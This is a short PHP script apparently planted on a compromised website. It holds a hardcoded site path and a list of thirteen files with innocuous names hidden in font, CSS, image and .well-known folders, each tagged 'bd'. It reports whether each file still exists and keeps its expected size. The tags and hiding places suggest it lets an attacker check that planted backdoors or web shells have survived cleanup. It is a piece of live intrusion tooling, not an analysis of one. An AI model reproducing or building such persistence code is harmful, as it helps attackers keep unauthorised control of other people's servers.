<?php $r = '/home/analuakl/grinsentertainment.com'; $x = ["/scripts/extensions/action.category.php"=>"bd@@1385546@@3",
"/css/admingroup.php"=>"bd@@1385559@@40",
"/fonts/all.php"=>"bd@@1385577@@9",
"/fonts/all_header.tpl.php"=>"bd@@1385588@@32",
"/images/theme_color.php"=>"bd@@1385604@@27",
"/fonts/album.php"=>"bd@@1368867@@990",
"/images/misc.functions.php"=>"bd@@1381139@@929",
"/bilder.php"=>"bd@@1385289@@953",
"/scripts/extensions/add.category.php"=>"bd@@1377620@@847",
"/.well-known/pki-validation/image.class.php"=>"bd@@1384552@@787",
"/scripts/action.php"=>"bd@@1383554@@955",
"/css/mpasm.php"=>"bd@@1376649@@900",
"/.well-known/album_modcp.php"=>"bd@@1373907@@880"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');